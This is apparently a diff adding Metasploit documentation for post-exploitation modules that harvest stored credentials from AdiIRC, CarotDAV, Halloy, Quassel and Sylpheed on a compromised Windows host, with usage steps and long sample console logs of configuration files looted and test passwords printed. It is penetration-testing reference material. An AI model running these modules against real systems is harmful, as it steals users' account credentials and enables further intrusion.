+[*] Downloading C:\Users\test\AppData\Local\AdiIRC\config.bak
+[*] Adi irc Config.bak downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508083813_default_10.0.0.2_AdiIRCconfig.ba_900175.bak
+
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] serverhost=chat.freenode.net
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] Serverhost=irc.test.net
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] serverport=6667
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] Serverport=6667
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] Usernick=TheTester
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] QuickPassword=tiaspbiqe2r
+[+] File with data saved:  /home/kali/.msf4/loot/20240508083814_default_10.0.0.2_EXTRACTIONconfig_209914.bak
+[*] Processing C:\Users\test\AppData\Local\AdiIRC
+[*] Downloading C:\Users\test\AppData\Local\AdiIRC\config.ini
+[*] Adi irc Config.ini downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508083814_default_10.0.0.2_AdiIRCconfig.in_918837.ini
+
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] serverhost=chat.freenode.net
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] Serverhost=irc.test.net
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] serverport=6667
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] Serverport=6667
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] Usernick=TheTester
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] QuickPassword=tiaspbiqe2r
+[+] File with data saved:  /home/kali/.msf4/loot/20240508083814_default_10.0.0.2_EXTRACTIONconfig_383684.ini
+[*] Processing C:\Users\test\AppData\Local\AdiIRC
+[*] Downloading C:\Users\test\AppData\Local\AdiIRC\networks.ini
+[*] Adi irc Networks.ini downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508083814_default_10.0.0.2_AdiIRCnetworks._579169.ini
+
+[+] File with data saved:  /home/kali/.msf4/loot/20240508083814_default_10.0.0.2_EXTRACTIONconfig_073623.ini
+[*] Adi irc's base folder found
+[*] Found the folder containing specified artifact for networks.
+[*] Adi irc's Networks file found
+[*] Processing C:\Users\test\AppData\Local\AdiIRC
+[*] Downloading C:\Users\test\AppData\Local\AdiIRC\networks.ini
+[*] Adi irc Networks.ini downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508083814_default_10.0.0.2_AdiIRCnetworks._045399.ini
+
+[*] undefined method `each' for nil:NilClass
+[*] Processing C:\Users\test\AppData\Local\AdiIRC
+[*] Downloading C:\Users\test\AppData\Local\AdiIRC\networks.bak
+[*] Adi irc Networks.bak downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508083815_default_10.0.0.2_AdiIRCnetworks._439992.bak
+
+[*] undefined method `each' for nil:NilClass
+[*] PackRat credential sweep Completed
+[*] Post module execution completed
+```
@@ -0,0 +1,107 @@
+## Vulnerable Application
+
+This post-exploitation module extracts clear text credentials from the CarotDAV ftp Client.
+
+The CarotDAV FTP Client is avaialble from (https://rei.to/carotdav_en.html).
+
+This module extracts information from the Setting file in the "AppData\Roaming\Rei Software\CarotDAV" directory.
+
+This module extracts server information such as connection name, target URI, username and password.
+
+
+## Verification Steps
+
+1. Start MSF console
+2. Get a Meterpreter session on a Windows system
+3. use post/windows/gather/credentials/carotdav_ftp
+4. Set SESSION 1
+5. enter 'run' to extract credentials from all applications
+
+
+## Options
+### VERBOSE
+
+By default verbose is turned off. When turned on, the module will show information on files
+which aren't extracted and information that is not directly related to the artifact output.
+
+
+### STORE_LOOT
+This option is turned on by default and saves the stolen artifacts/files on the local machine,
+this is required for also extracting credentials from files using regexp, JSON, XML, and SQLite queries.
+
+
+### EXTRACT_DATA
+This option is turned on by default and will perform the data extraction using the predefined
+regular expression. The 'Store loot' options must be turned on in order for this to take work.
+
+## Scenarios
+### CarotDAV FTP v1.16.3 on Microsoft Windows 10 Home 10.0.19045 N/A Build 19045 - Default Output
+```
+msf6 post(windows/gather/credentials/carotdav_ftp) > run
+
+[*] Filtering based on these selections:  
+[*] ARTIFACTS: All
+[*] STORE_LOOT: true
+[*] EXTRACT_DATA: true
+
+[*] Carotdav's Setting file found
+[*] Downloading C:\Users\test\AppData\Roaming\Rei Software\CarotDAV\Setting.xml
+[*] Carotdav Setting.xml downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508103946_default_10.0.0.2_CarotDAVSetting._341142.xml
+
+[+] <Name>TheTestBed</Name>
+[+] <Name>Aperture Testing Laboratories</Name>
+[+] <TargetUri>ftp://10.0.0.2/</TargetUri>
+[+] <TargetUri>ftp://10.0.0.3/</TargetUri>
+[+] <UserName>TestBed\TheTester</UserName>
+[+] <UserName>TestBed\TheBackupTester</UserName>
+[+] <Password>dABpAGEAcwBwAGIAaQBxAGUAMgByAA==</Password>
+[+] <Password>dABpAGEAcwBwAGIAaQBxAGUAMgByAA==</Password>
+[+] File with data saved:  /home/kali/.msf4/loot/20240508103947_default_10.0.0.2_EXTRACTIONSSetti_673514.xml
+[*] PackRat credential sweep Completed
+[*] Post module execution completed
+
+```
+
+### CarotDAV FTP v1.16.3 on Microsoft Windows 10 Home 10.0.19045 N/A Build 19045 - Verbose Output
+```
+msf6 post(windows/gather/credentials/carotdav_ftp) > run
+
+[*] Filtering based on these selections:  
+[*] ARTIFACTS: All
+[*] STORE_LOOT: true
+[*] EXTRACT_DATA: true
+
+[*] Starting Packrat...
+[-] Carotdav's base folder not found in users's user directory
+
+[*] Starting Packrat...
+[*] Carotdav's base folder found
+[*] Found the folder containing specified artifact for Setting.
+[*] Carotdav's Setting file found
+[*] Processing C:\Users\test\AppData\Roaming\Rei Software\CarotDAV
+[*] Downloading C:\Users\test\AppData\Roaming\Rei Software\CarotDAV\Setting.xml
+[*] Carotdav Setting.xml downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508103903_default_10.0.0.2_CarotDAVSetting._292914.xml
+
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] <Name>TheTestBed</Name>
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] <Name>Aperture Testing Laboratories</Name>
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] <TargetUri>ftp://10.0.0.2/</TargetUri>
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] <TargetUri>ftp://10.0.0.3/</TargetUri>
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] <UserName>TestBed\TheTester</UserName>
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] <UserName>TestBed\TheBackupTester</UserName>
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] <Password>dABpAGEAcwBwAGIAaQBxAGUAMgByAA==</Password>
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] <Password>dABpAGEAcwBwAGIAaQBxAGUAMgByAA==</Password>
+[+] File with data saved:  /home/kali/.msf4/loot/20240508103903_default_10.0.0.2_EXTRACTIONSSetti_754664.xml
+[*] PackRat credential sweep Completed
+[*] Post module execution completed
+
+```
@@ -0,0 +1,93 @@
+## Vulnerable Application
+
+This post-exploitation module extracts clear text credentials from the Halloy IRC Client.
+
+The Halloy IRC Client is avaialble from (https://github.com/squidowl/halloy).
+
+This module extracts information from the config.toml file in the "AppData\Roaming\Halloy" directory.
+
+This module extracts server information such as server, port, nickname, password and proxy password.
+
+
+## Verification Steps
+
+1. Start MSF console
+2. Get a Meterpreter session on a Windows system
+3. use post/windows/gather/credentials/halloy_irc
+4. Set SESSION 1
+5. enter 'run' to extract credentials from all applications
+
+
+## Options
+### VERBOSE
+
+By default verbose is turned off. When turned on, the module will show information on files
+which aren't extracted and information that is not directly related to the artifact output.
+
+
+### STORE_LOOT
+This option is turned on by default and saves the stolen artifacts/files on the local machine,
+this is required for also extracting credentials from files using regexp, JSON, XML, and SQLite queries.
+
+
+### EXTRACT_DATA
+This option is turned on by default and will perform the data extraction using the predefined
+regular expression. The 'Store loot' options must be turned on in order for this to take work.
+
+## Scenarios
+### Halloy v2024.6 on Microsoft Windows 10 Home 10.0.19045 N/A Build 19045 - Default Output
+```
+msf6 post(windows/gather/credentials/halloy_irc) > run
+
+[*] Filtering based on these selections:  
+[*] ARTIFACTS: All
+[*] STORE_LOOT: true
+[*] EXTRACT_DATA: true
+
+[*] Halloy irc's Config.toml file found
+[*] Downloading C:\Users\test\AppData\Roaming\halloy\config.toml
+[*] Halloy irc Config.toml downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240507133313_default_10.0.0.2_HalloyIRCconfig_968975.toml
+
+[+] server="irc.libera.chat"
+[+] port=6697
+[+] nickname="halloy4169"
+[+] File with data saved:  /home/kali/.msf4/loot/20240507133313_default_10.0.0.2_EXTRACTIONconfig_815098.toml
+[*] PackRat credential sweep Completed
+[*] Post module execution completed
+
+```
+
+### Halloy v2024.6 on Microsoft Windows 10 Home 10.0.19045 N/A Build 19045 - Verbose Output
+```
+
+msf6 post(windows/gather/credentials/halloy_irc_v2) > run
+
+[*] Filtering based on these selections:  
+[*] ARTIFACTS: All
+[*] STORE_LOOT: true
+[*] EXTRACT_DATA: true
+
+[*] Starting Packrat...
+[-] Halloy irc's base folder not found in users's user directory
+
+[*] Starting Packrat...
+[*] Halloy irc's base folder found
+[*] Found the folder containing specified artifact for config.toml.
+[*] Halloy irc's Config.toml file found
+[*] Processing C:\Users\test\AppData\Roaming\halloy
+[*] Downloading C:\Users\test\AppData\Roaming\halloy\config.toml
+[*] Halloy irc Config.toml downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240507145656_default_10.0.0.2_HalloyIRCconfig_292638.toml
+
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] server="irc.libera.chat"
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] port=6697
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] nickname="halloy4169"
+[+] File with data saved:  /home/kali/.msf4/loot/20240507145656_default_10.0.0.2_EXTRACTIONconfig_238220.toml
+[*] PackRat credential sweep Completed
+[*] Post module execution completed
+
+```
@@ -0,0 +1,131 @@
+## Vulnerable Application
+
+This post-exploitation module extracts clear text credentials from the Quassel IRC Client.
+
+The Quassel IRC Client is avaialble from (https://quassel-irc.org/downloads).
+
+This module extracts information from the quasselclient.ini file in the "AppData\Roaming\quassel-irc.org" directory.
+
+This module extracts server information such as host name, port, account name, password and proxy password.
+
+
+## Verification Steps
+
+1. Start MSF console
+2. Get a Meterpreter session on a Windows system
+3. use post/windows/gather/credentials/quasell_irc
+4. Set SESSION 1
+5. enter 'run' to extract credentials from all applications
+
+
+## Options
+### VERBOSE
+
+By default verbose is turned off. When turned on, the module will show information on files
+which aren't extracted and information that is not directly related to the artifact output.
+
+
+### STORE_LOOT
+This option is turned on by default and saves the stolen artifacts/files on the local machine,
+this is required for also extracting credentials from files using regexp, JSON, XML, and SQLite queries.
+
+
+### EXTRACT_DATA
+This option is turned on by default and will perform the data extraction using the predefined
+regular expression. The 'Store loot' options must be turned on in order for this to take work.
+
+## Scenarios
+### Quassel Client v0.14.0 on Microsoft Windows 10 Home 10.0.19045 N/A Build 19045 - Default Output
+```
+msf6 post(windows/gather/credentials/quassel_irc) > run
+
+[*] Filtering based on these selections:  
+[*] ARTIFACTS: All
+[*] STORE_LOOT: true
+[*] EXTRACT_DATA: true
+
+[*] Quassel irc's Quasselclient.ini file found
+[*] Downloading C:\Users\test\AppData\Roaming\quassel-irc.org\quasselclient.ini
+[*] Quassel irc Quasselclient.ini downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240507163717_default_10.0.0.2_QuasselIRCquass_570372.ini
+
+[+] 1\HostName=10.245.100.2
+[+] 2\HostName=10.0.0.3
+[+] 1\Port=4242
+[+] 2\Port=1234
+[+] 1\AccountName=Test
+[+] 2\AccountName=Test#2
+[+] 1\Password=tiaspbiqe2r
+[+] 2\Password=tiaspbiqe2r
+[+] 1\ProxyHostName=localhost
+[+] 2\ProxyHostName=
+[+] 1\ProxyPort=8080
+[+] 2\ProxyPort=8080
+[+] 1\ProxyUser=test
+[+] 2\ProxyUser=
+[+] 1\ProxyPassword=tiaspbiqe2r
+[+] 2\ProxyPassword=
+[+] File with data saved:  /home/kali/.msf4/loot/20240507163717_default_10.0.0.2_EXTRACTIONquasse_134569.ini
+[*] PackRat credential sweep Completed
+[*] Post module execution completed
+
+```
+
+### Quassel Client v0.14.0 on Microsoft Windows 10 Home 10.0.19045 N/A Build 19045 - Verbose Output
+```
+msf6 post(windows/gather/credentials/quassel_irc) > run
+
+[*] Filtering based on these selections:  
+[*] ARTIFACTS: All
+[*] STORE_LOOT: true
+[*] EXTRACT_DATA: true
+
+[*] Starting Packrat...
+[-] Quassel irc's base folder not found in user's user directory
+
+[*] Starting Packrat...
+[*] Quassel irc's base folder found
+[*] Found the folder containing specified artifact for quasselclient.ini.
+[*] Quassel irc's Quasselclient.ini file found
+[*] Processing C:\Users\test\AppData\Roaming\quassel-irc.org
+[*] Downloading C:\Users\test\AppData\Roaming\quassel-irc.org\quasselclient.ini
+[*] Quassel irc Quasselclient.ini downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240507164141_default_10.0.0.2_QuasselIRCquass_310535.ini
+
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] 1\HostName=10.245.100.2
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] 2\HostName=10.0.0.3
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] 1\Port=4242
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] 2\Port=1234
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] 1\AccountName=Test
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] 2\AccountName=Test#2
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] 1\Password=tiaspbiqe2r
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] 2\Password=tiaspbiqe2r
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] 1\ProxyHostName=localhost
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] 2\ProxyHostName=
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] 1\ProxyPort=8080
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] 2\ProxyPort=8080
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] 1\ProxyUser=test
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] 2\ProxyUser=
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] 1\ProxyPassword=tiaspbiqe2r
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] 2\ProxyPassword=
+[+] File with data saved:  /home/kali/.msf4/loot/20240507164141_default_10.0.0.2_EXTRACTIONquasse_967148.ini
+[*] PackRat credential sweep Completed
+[*] Post module execution completed
+
+```
@@ -0,0 +1,408 @@
+## Vulnerable Application
+
+This post-exploitation module extracts clear text credentials from the Sylpheed Email Client.
+
+The Sylpheed Email Client is avaialble from (https://sylpheed.sraoss.jp/en/).
+
+This module extracts information from the accountrc file in the "AppData\Roaming\Sylpheed" directory.
+
+This module extracts server information such as account name, username, email address and password.
+
+
+## Verification Steps
+
+1. Start MSF console
+2. Get a Meterpreter session on a Windows system
+3. use post/windows/gather/credentials/sylpheed
+4. Set SESSION 1
+5. enter 'run' to extract credentials from all applications
+
+
+## Options
+### VERBOSE
+
+By default verbose is turned off. When turned on, the module will show information on files
+which aren't extracted and information that is not directly related to the artifact output.
+
+
+### STORE_LOOT
+This option is turned on by default and saves the stolen artifacts/files on the local machine,
+this is required for also extracting credentials from files using regexp, JSON, XML, and SQLite queries.
+
+
+### EXTRACT_DATA
+This option is turned on by default and will perform the data extraction using the predefined
+regular expression. The 'Store loot' options must be turned on in order for this to take work.
+
+## Scenarios
+### Sylpheed v3.17.0 on Microsoft Windows 10 Home 10.0.19045 N/A Build 19045 - Default Output
+```
+msf6 post(windows/gather/credentials/sylpheed) > run
+
+[*] Filtering based on these selections:  
+[*] ARTIFACTS: All
+[*] STORE_LOOT: true
+[*] EXTRACT_DATA: true
+
+[*] Sylpheed's Accountrc file found
+[*] Downloading C:\Users\test\AppData\Roaming\Sylpheed\accountrc
+[*] Sylpheed Accountrc downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508100023_default_10.0.0.2_Sylpheedaccountr_511987.bin
+
+[+] account_name=tmctestface50@gmail.com
+[+] account_name=TheTestBed@testers.com
+[+] account_name=tmctestface50@gmail.com
+[+] name=tmctestface50@gmail.com
+[+] name=TestMcTestFace
+[+] name=TheTestBed@testers.com
+[+] name=Test
+[+] name=Wojtek
+[+] name=tmctestface50@gmail.com
+[+] name=Testy
+[+] address=tmctestface50@gmail.com
+[+] address=TheTestBed@testers.com
+[+] address=tmctestface50@gmail.com
+[+] password=tiaspbiqe2r
+[+] password=tiaspbiqe2r
+[+] File with data saved:  /home/kali/.msf4/loot/20240508100023_default_10.0.0.2_EXTRACTIONaccoun_507929.bin
+[*] Downloading C:\Users\test\AppData\Roaming\Sylpheed\accountrc.bak.1
+[*] Sylpheed Accountrc.bak.1 downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508100023_default_10.0.0.2_Sylpheedaccountr_329585.1
+
+[+] account_name=tmctestface50@gmail.com
+[+] account_name=TheTestBed@testers.com
+[+] account_name=tmctestface50@gmail.com
+[+] name=tmctestface50@gmail.com
+[+] name=TestMcTestFace
+[+] name=TheTestBed@testers.com
+[+] name=Test
+[+] name=Wojtek
+[+] name=tmctestface50@gmail.com
+[+] name=Testy
+[+] address=tmctestface50@gmail.com
+[+] address=TheTestBed@testers.com
+[+] address=tmctestface50@gmail.com
+[+] password=tiaspbiqe2r
+[+] password=tiaspbiqe2r
+[+] File with data saved:  /home/kali/.msf4/loot/20240508100024_default_10.0.0.2_EXTRACTIONaccoun_146899.1
+[*] Downloading C:\Users\test\AppData\Roaming\Sylpheed\accountrc.bak
+[*] Sylpheed Accountrc.bak downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508100024_default_10.0.0.2_Sylpheedaccountr_450482.bak
+
+[+] account_name=tmctestface50@gmail.com
+[+] account_name=TheTestBed@testers.com
+[+] account_name=tmctestface50@gmail.com
+[+] name=tmctestface50@gmail.com
+[+] name=TestMcTestFace
+[+] name=TheTestBed@testers.com
+[+] name=Test
+[+] name=Wojtek
+[+] name=tmctestface50@gmail.com
+[+] name=Testy
+[+] address=tmctestface50@gmail.com
+[+] address=TheTestBed@testers.com
+[+] address=tmctestface50@gmail.com
+[+] password=tiaspbiqe2r
+[+] password=tiaspbiqe2r
+[+] File with data saved:  /home/kali/.msf4/loot/20240508100024_default_10.0.0.2_EXTRACTIONaccoun_424899.bak
+[*] Downloading C:\Users\test\AppData\Roaming\Sylpheed\accountrc.bak.2
+[*] Sylpheed Accountrc.bak.2 downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508100024_default_10.0.0.2_Sylpheedaccountr_852103.2
+
+[+] account_name=tmctestface50@gmail.com
+[+] account_name=TheTestBed@testers.com
+[+] account_name=tmctestface50@gmail.com
+[+] name=tmctestface50@gmail.com
+[+] name=TestMcTestFace
+[+] name=TheTestBed@testers.com
+[+] name=Test
+[+] name=Wojtek
+[+] name=tmctestface50@gmail.com
+[+] name=Testy
+[+] address=tmctestface50@gmail.com
+[+] address=TheTestBed@testers.com
+[+] address=tmctestface50@gmail.com
+[+] password=tiaspbiqe2r
+[+] password=tiaspbiqe2r
+[+] File with data saved:  /home/kali/.msf4/loot/20240508100024_default_10.0.0.2_EXTRACTIONaccoun_342490.2
+[*] Downloading C:\Users\test\AppData\Roaming\Sylpheed\accountrc.bak.3
+[*] Sylpheed Accountrc.bak.3 downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508100024_default_10.0.0.2_Sylpheedaccountr_575350.3
+
+[+] account_name=tmctestface50@gmail.com
+[+] account_name=TheTestBed@testers.com
+[+] account_name=tmctestface50@gmail.com
+[+] name=tmctestface50@gmail.com
+[+] name=TestMcTestFace
+[+] name=TheTestBed@testers.com
+[+] name=Test
+[+] name=Wojtek
+[+] name=tmctestface50@gmail.com
+[+] name=Testy
+[+] address=tmctestface50@gmail.com
+[+] address=TheTestBed@testers.com
+[+] address=tmctestface50@gmail.com
+[+] password=tiaspbiqe2r
+[+] password=tiaspbiqe2r
+[+] File with data saved:  /home/kali/.msf4/loot/20240508100025_default_10.0.0.2_EXTRACTIONaccoun_038250.3
+[*] Downloading C:\Users\test\AppData\Roaming\Sylpheed\accountrc.bak.4
+[*] Sylpheed Accountrc.bak.4 downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508100025_default_10.0.0.2_Sylpheedaccountr_780534.4
+
+[+] account_name=tmctestface50@gmail.com
+[+] account_name=TheTestBed@testers.com
+[+] account_name=tmctestface50@gmail.com
+[+] name=tmctestface50@gmail.com
+[+] name=TestMcTestFace
+[+] name=TheTestBed@testers.com
+[+] name=Test
+[+] name=Wojtek
+[+] name=tmctestface50@gmail.com
+[+] name=Testy
+[+] address=tmctestface50@gmail.com
+[+] address=TheTestBed@testers.com
+[+] address=tmctestface50@gmail.com
+[+] password=tiaspbiqe2r
+[+] File with data saved:  /home/kali/.msf4/loot/20240508100025_default_10.0.0.2_EXTRACTIONaccoun_554415.4
+[*] PackRat credential sweep Completed
+[*] Post module execution completed
+
+```
+
+### Sylpheed v3.17.0 on Microsoft Windows 10 Home 10.0.19045 N/A Build 19045 - Verbose Output
+```
+
+msf6 post(windows/gather/credentials/sylpheed) > run
+
+[*] Filtering based on these selections:  
+[*] ARTIFACTS: All
+[*] STORE_LOOT: true
+[*] EXTRACT_DATA: true
+
+[*] Starting Packrat...
+[-] Sylpheed's base folder not found in user's user directory
+
+[*] Starting Packrat...
+[*] Sylpheed's base folder found
+[*] Found the folder containing specified artifact for accountrc.
+[*] Sylpheed's Accountrc file found
+[*] Processing C:\Users\test\AppData\Roaming\Sylpheed
+[*] Downloading C:\Users\test\AppData\Roaming\Sylpheed\accountrc
+[*] Sylpheed Accountrc downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508095409_default_10.0.0.2_Sylpheedaccountr_913568.bin
+
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] account_name=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] account_name=TheTestBed@testers.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] account_name=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=TestMcTestFace
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=TheTestBed@testers.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=Test
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=Wojtek
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=Testy
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] address=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] address=TheTestBed@testers.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] address=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] password=tiaspbiqe2r
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] password=tiaspbiqe2r
+[+] File with data saved:  /home/kali/.msf4/loot/20240508095409_default_10.0.0.2_EXTRACTIONaccoun_539546.bin
+[*] Processing C:\Users\test\AppData\Roaming\Sylpheed
+[*] Downloading C:\Users\test\AppData\Roaming\Sylpheed\accountrc.bak.1
+[*] Sylpheed Accountrc.bak.1 downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508095409_default_10.0.0.2_Sylpheedaccountr_194058.1
+
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] account_name=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] account_name=TheTestBed@testers.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] account_name=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=TestMcTestFace
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=TheTestBed@testers.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=Test
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=Wojtek
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=Testy
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] address=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] address=TheTestBed@testers.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] address=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] password=tiaspbiqe2r
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] password=tiaspbiqe2r
+[+] File with data saved:  /home/kali/.msf4/loot/20240508095410_default_10.0.0.2_EXTRACTIONaccoun_583721.1
+[*] Processing C:\Users\test\AppData\Roaming\Sylpheed
+[*] Downloading C:\Users\test\AppData\Roaming\Sylpheed\accountrc.bak
+[*] Sylpheed Accountrc.bak downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508095410_default_10.0.0.2_Sylpheedaccountr_972346.bak
+
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] account_name=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] account_name=TheTestBed@testers.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] account_name=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=TestMcTestFace
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=TheTestBed@testers.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=Test
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=Wojtek
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=Testy
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] address=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] address=TheTestBed@testers.com
+
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] address=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] password=tiaspbiqe2r
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] password=tiaspbiqe2r
+[+] File with data saved:  /home/kali/.msf4/loot/20240508095410_default_10.0.0.2_EXTRACTIONaccoun_967284.bak
+[*] Processing C:\Users\test\AppData\Roaming\Sylpheed
+[*] Downloading C:\Users\test\AppData\Roaming\Sylpheed\accountrc.bak.2
+[*] Sylpheed Accountrc.bak.2 downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508095410_default_10.0.0.2_Sylpheedaccountr_879167.2
+
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] account_name=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] account_name=TheTestBed@testers.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] account_name=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=TestMcTestFace
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=TheTestBed@testers.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=Test
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=Wojtek
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=Testy
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] address=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] address=TheTestBed@testers.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] address=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] password=tiaspbiqe2r
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] password=tiaspbiqe2r
+[+] File with data saved:  /home/kali/.msf4/loot/20240508095411_default_10.0.0.2_EXTRACTIONaccoun_021730.2
+[*] Processing C:\Users\test\AppData\Roaming\Sylpheed
+[*] Downloading C:\Users\test\AppData\Roaming\Sylpheed\accountrc.bak.3
+[*] Sylpheed Accountrc.bak.3 downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508095411_default_10.0.0.2_Sylpheedaccountr_102901.3
+
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] account_name=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] account_name=TheTestBed@testers.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] account_name=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
